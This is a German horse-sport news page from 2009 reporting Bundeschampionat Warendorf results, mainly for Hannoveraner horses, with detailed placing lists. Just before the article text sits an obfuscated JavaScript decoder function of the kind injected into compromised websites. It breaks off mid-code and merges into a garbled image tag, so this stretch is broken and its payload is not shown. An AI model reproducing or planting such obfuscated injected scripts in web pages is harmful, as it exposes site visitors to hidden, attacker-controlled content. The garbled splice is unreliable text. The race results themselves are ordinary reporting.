Ergebnisse Bundeschampionat Warendorf

9. September 2009 | Von Redaktion | Kategorie: Pferdesport, Top Feature, Zucht

function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand-kopie” src=”http://horse-today.de/wp-content/uploads/2009/05/hannoveraner_verband-kopie.jpg" alt="hannoveraner_verband-kopie" width="100" height="98" />Die diesjährigen Bundeschampionate in Warendorf sind für die Pferde aus der Hannoveraner Zucht erfolgreich verlaufen. Drei der möglichen elf Titel wurden errungen, es folgen Bayern und Westfalen mit je zwei Titeln.

Dark Knight v. Don Crusador/Cheenook (Z.: Christine Runge, Borstel) gewann mit Heiko Klausing bei den dreijährigen Hengsten. Der Rappe gehört zur Kollektion der bevorstehenden 121. Verdener Elite-Auktion.

Dark Knight v. Don Crusador/Cheenook gewann mit Heiko Klausing bei den dreijährigen Hengsten.

Dark Knight v. Don Crusador/Cheenook gewann mit Heiko Klausing bei den dreijährigen Hengsten.

Den Vorjahrserfolge wiederholte Lissaro van de Helle v. Lissabon/Matcho AA (Z.: Jürgen Dittmer, Neuenkirchen) mit Claudia Rüscher in diesem Jahr bei den vierjährigen Hengsten. In dieser Konkurrenz stellte Hannover alle Medaillisten, Silber gewann Sarkozy v. Sandro Hit/Weltmeyer (Z.: Arno Mester, Menslage) mit Eva Möller, Bronze ging an Ricky v. Rubin-Royal/Weltmeyer (Z.: Günter Lindwehr, Alfhausen) mit Hermann Burger.

Dritter im Bunde der Titelträger wurde ein fünfjähriges Springpferd: Quaid v. Quidam’s Rubin/Voltaire (Z.: Friedhelm Vehlber, Espelkamp), der von Johannes Ehning geritten wurde. Der Hengst im tschechischen Besitz steht in Diensten den Niedersächsischen Landgestüts Celle. Das gute Bild, das die Hannoveraner Springpferde in Warendorf abgaben, wurde mit dem Vize-Bundeschampion in dieser Altersklasse Shaitaan OSF v. Stolzenberg/For Future (Z.: Lutz Wimmer, Helmstedt) mit Frederik Knorren belohnt. Bronze bei den sechsjährigen Springpferden ging an Echt Stark v. Escudo/Grand Ferdinand II (Z.: Daniela Stark, Lindwedel) mit Henrik v. Eckermann.

Drei Medaillen gab es für die Hannoveraner Dressurpferde: Bei den Fünfjährigen gewann Kira Wulferding Silber mit dem Hengst Rosandro v. Rosario/Sandro Hit (Z.: Gestüt Lewitz, Steinfeld) und Christin Schütte Bronze mit dem ehemaligen Verdener Elite-Auktionspferd Eloy v. Earl/Wendenburg (Z.: Johann Fuseler, Schiffdorf). Bronze bei den Sechsjährigen ging an Dorothee Schneider mit La Noire v. Londonderry/Alabaster (Z.: Heinrich Ramsbrock, Menslage).

Das Bild der vielseitigen Qualitäten der Hannoveraner wurde komplettiert durch Escade JS v. Embassy/Lehnsherr (Z.: Jürgen Stuhtmann, Winsen), die mit Andreas Brandt Vize-Championesse der fünfjährigen Vielseitigkeitspferde wurde.

Dreijährige Reitpferde (Hengste)

1. Dark Knight v. Don Crusador/Cheenook
Z.: Christine Runge, Borstel
R.: Heiko Klausing

2. So What a Feeling v. Sandro Hit/Ex Libris
Oldenburg
R.: Dr. Katja Weisbrod

3. Bvlgari v. Belissimo M/World Magic
Rheinland
R.: Heiko Klausing

Vierjährige Reitpferde (Hengste)

1. Lissaro von de Helle v. Lissabon/Matcho AA
Z.: Jürgen Dittmer, Neuenkirchen
R.: Claudia Rüscher

2. Sarkozy v. Sandro Hit/Weltmeyer
Z.: Arno Mester, Menslage
R.: Eva Möller

3. Ricky v. Rubin-Royal/Weltmeyer
Z.: Günter Lindwehr, Alfhausen
R.: Hermann Burger

Dreijährige Reitpferde (Stuten/Wallache)

1. Damon's Divene v. Damon Hill/Rubin Royal
Westfalen
R.: Ingrid Klimke

2. ERA Wunderschöne v. Sunny-Boy/Donnerhall
Oldenburg
R.: Stefan Blanken

3. Loveliness v. Lord Loxley/Sir Shostakovich xx
Rheinland
R.: Jana Freund

Hannoveraner im Finale:

6. Shocolata v. Stedinger/Rotspon
Z.: Dieter Baumann, Maxdorf
R.: Susanne Sievern

Vierjährige Reitpferde (Stuten/Wallache)

1. Preziosa v. Belissimo M/Piaster
Bayern
R.: Geertje Hesse

2. Florestine v. Florestan I/Rohdiamant
Rheinland
R.: Christine Nolden

3. Weihegold OLD v. Don Schufro/Sandro Hit
Oldenburg
R.: Kira Wulferding

Hannoveraner im Finale:

4. Sacre Coeur v. Sir Donnerhall I/Pik Bube II
Z.: Helmut G. Heidmeyer, Rahden
R.: Henrike Sommer

5. Royal Spirit v. Romanov Blue Hors/Weltgeist
Z.: Heinrich Gießelmann, Barver
R.: Jan-Dirk Gießelmann

8. Horatio v. Hochadel/Matcho AA
Z.: Susanne Buroch, Holste
R.: Dorothee Schneider

Fünfjährige Springpferde

1. Quaid v. Quidam's Rubin/Voltaire
Z.: Friedhelm Vehlber, Espelkamp
R.: Johannes Ehning

2. Shaitaan OSF v. Stolzenberg/For Future
Z.: Lutz Wimmer, Helmstedt
R.: Frederik Knorren

3. Urmel v. Casario II/Coriall
Holstein
R.: Phlipp Weishaupt

Hannoveraner im Finale:

5. Anton v. Adlantico As/Acord II
Z.: Adolf Tietje, Osterholz-Scharmbeck
R.: Eva Bitter

9. Firth of Lorne v. For Pleasure/Stakkato
Z.: M. Rölleke, Bochum
R.: Gerd Könemann

10. Conrad B v. Contendro I/Eiger I
Z.: Hasso Buchholz, Eicklingen
R.: Thomas Öhmann

15. Stavaro v. Stakkato/Calvaro Z
Z.: Gestüt Lewitz, Steinfeld
R.: Alois Pollmann-Schweckhorst

17. Caresse v. Cento/Sandro
Z.: Dietrich Schulze, Wedemark
R.: Philipp Weishaupt

29. El-Bambi v. El Bundy/Polydor
Z.: Prof. Dr. K.-H. Böhm, Hannover
R.: Hendrik Zurich

Sechsjährige Springpferde

1. Con Air v. Contendro I/Lancer III
Oldenburg
R.: Rene Tebbel

2. Appearance v. Armitage/Levantos
Oldenburg
R.: Johannes Ehning

3. Echt Stark v. Escudo/Grand Ferdinand II
Z.: Daniela Stark, Lindwedel
R.: Henrik von Eckermann

Hannoveraner im Finale:

14. Salut d'amour v. Stakkato/Sherlock Holmes
Z.: Adolf Feldmann, Hänigsen
R.: Eva Bitter

26. Accino v. Acorado I/Silvio I
Z.: Helmut Kremeike, Müden/Aller
R.: Bernd Schulze Topphoff

Fünfjährige Dressurpferde

1. Blickpunkt v. Belissimo M/Weltmeyer
Westfalen
R.: Eva Möller

2. Rosandro v. Rosario/Sandro Hit
Z.: Gestüt Lewitz, Steinfeld
R.: Kira Wulferding

3. Eloy v. Earl/Wendenburg
Z.: Johann Fuseler, Schiffdorf
R.: Christin Schütte

Hannoveraner im Finale:

5. Soliere v. Sandro Hit/Donnerhall
Z.: Sandra Neff, Geismar
R.: Eva Möller

8. Watulele (VA) v. Wolkenstein/Frapant
Z.: Richard Brümmer, Osten
R.: Esther Maruhn

9. Real Dancer v. Rubin-Royal/De Niro
Z.: Friedrich Oppermann, Salzgitter
R.: Jan-Dirk Gießelmann

11. Dandolo (VA) v. Don Vino/Mon Cherie
Z.: H. Wübben, Wietmarschen
R.: Frank Mohr

14. Benetton Dream v. Brentano II/Rotspon
Z.: Axel Windeler, Verden
R.: Holga Finken

18. Rezeptor v. Rosentau/Weltmeyer
Z.: Johan TenCate, Wielen
R.: Sabine Rueben

Sechsjährige Dressurpferde

1. Birkhofs Denario v. Denaro/Fair Play
Bayern
Z.: Nicole Casper

2. Della Cavalleria v. Diamond Hit/Rubinstein I
Oldenburg
R.: Kira Wulferding

3. La Noire v. Londonderry/Alabaster
Z.: Heinrich Ramsbrock, Menslage
R.: Dorothee Schneider

Hannoveraner/Hessen im Finale:

4. Rassolini (VA) v. RubiosoN/Silvano
Z.: Horst Hofmann, Bad Nauheim
R.: Kathrin Meyer zu Strohen

7. Burlington v. Breitling W/Rohdiamant
Z.: H.-H. Oltmann, Borstel
R.: Charlott-Maria Schürmann

9. Florinero v. Fürst Heinrich/A Jungle Prince
Z.: Martin Otten-Willers, Kutenholz
R.: Dorothee Schneider

12. Delgardo M v. Depardieu/Caprimond
Z.: Christine Müller, Stade
R.: Marco Bührig

15. Corlando (VA) v. Contendro I/Langata Express xx
Z.: Hans-Günter Berner, Bienenbüttel
R.: Katharina Winkelhues

Fünfjährige Vielseitigkeitspferde

1. Composer v. Conello/Lancetto
Holstein
R.: Andrew Hoy

2. Escada JS v. Embassy I/Lehnsherr
Z.: Jürgen Stuhtmann, Winsen
R.: Andreas Brandt

3. Parmenidas v. Sir Chamberlain/Habicht
Trakehner
R.: Ingrid Klimke

Hannoveraner im Finale:

5. Rubinja TE (VA) v. Rubin-Royal/Eklatant
Z.: Zuchthof Düvel, Katlenburg
R.: Anna-Thea Folkmar-Jakobsen

11. Great little Girl v. Garant/Acord II
Z.: Werner Roloff, Uelzen
R.: Vanessa Hölscher-Bölting

Sechsjährige Vielseitgkeitspferde

1. Herzog v. Tambour/Inkognito
Trakehner
R.: Elmar Lesch

2. Donja v. D'Olympic/Meerwirbel
Mecklenburg
R.: Andreas Brandt

3. Frankyboy v. Florestan I/Salinator
Westfalen
R.: Jonna Friman

Hannoveraner im Finale:

5. Leander v. Londonderry/Wanderbursch II
Z.: Ewald-Johann Wimberg, Friesoythe
R.: Sandra Auffarth

9. Hilton P v. Heraldik xx/Quasi Roi
Z.: Herbert Putfarcken, Hamburg
R.: Elmar Lesch

10 Sammy-Jo v. Sergeant Pepper/Sandro
Z.: Werner Hohloch, Springe
R.: Nadine Marzahl

Vier- und fünfjährige Fahrpferde

1. FST Arielle v. Lord Goldfever/Grosso Z
Deutsches Sportpferd
F.: Bettina Winkler

2. Luminatos v. Londonderry/Beltain
Westfalen
F.: Christian Koller

3. Dirigent v. Dartagnan/Carol
Z.: Heinz Günter Reber, Eppstein
F.: Dieter Lauterbach

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=10883

Hier klicken, um einen Kommentar zu schreiben